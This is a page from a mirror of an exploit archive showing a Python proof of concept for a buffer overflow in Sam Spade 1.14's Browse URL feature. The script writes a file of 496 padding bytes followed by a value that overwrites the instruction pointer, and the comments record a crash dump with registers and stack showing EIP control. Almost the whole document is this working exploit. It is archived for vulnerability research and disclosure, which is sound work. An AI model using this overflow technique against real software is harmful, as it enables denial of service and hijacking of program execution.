bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/38705.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
1.2 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 14/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
# Tested on OS : Windows 7 Home Basic
# Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http://
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#0012F73C 41414141 AAAA
#0012F740 41414141 AAAA
#0012F744 DEADBEAF ¯¾­Þ
# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF
f = open("sam_spade_browse_url.txt", "w")
Junk = "A"* 496
eip_overwrite = "\xaf\xbe\xad\xde"
f.write(Junk+eip_overwrite)
f.close()
Reference in a new issue View git blame Copy permalink